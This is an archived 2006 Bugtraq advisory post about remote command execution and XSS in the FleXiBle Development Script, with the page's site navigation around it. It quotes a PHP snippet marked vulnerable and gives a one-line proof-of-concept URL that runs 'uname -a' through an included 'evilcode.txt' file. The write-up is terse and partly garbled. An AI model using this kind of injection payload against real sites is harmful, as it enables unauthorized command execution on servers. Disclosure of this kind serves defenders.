Nmap Security Scanner
*Intro
*Ref Guide
*Install Guide
*Download
*Changelog
*Book
*Docs
Security Lists
*Nmap Hackers
*Nmap Dev
*Bugtraq
*Full Disclosure
*Pen Test
*Basics
*More
Security Tools
*Pass crackers
*Sniffers
*Vuln Scanners
*Web scanners
*Wireless
*Exploitation
*Packet crafters
*More
Site News
Site Search:
Exploit World
Advertising
About/Contact
Credits
Sponsors:
edgeos



Bugtraq: FleXiBle Development Script Remote Command Exucetion And XSS Attacking

FleXiBle Development Script Remote Command Exucetion And XSS Attacking

From: <botan_at_linuxmail.org>
Date: 1 Apr 2006 19:15:14 -0000
('binary' encoding is not supported, stored as-is) Description :

/* =================================================
File created by Andries Bruinsma
(c) FleXiBle Development (FXB)
Web: http://www.ahbruinsma.nl
Email: renegade_at_clanflex.com
===================================================
File: main.php
Version: 3.0
Date started: 10th May, 2004
Last modified : 24th January, 2006
Last Update: New layout

=================================================

Vulnerable

ob_start(ob_gzhandler);
//Defining some functions and including them
require('php/messages.php');
//require base-file
//require_once('php/base.php');
include_once "baseconfig.inc.php";

http://www.site.com/[path]/evilcode.txt?&cmd=uname -a
Received on Apr 01 2006

[ Nmap | Sec Tools | Mailing Lists | Site News | About/Contact | Advertising | Privacy ]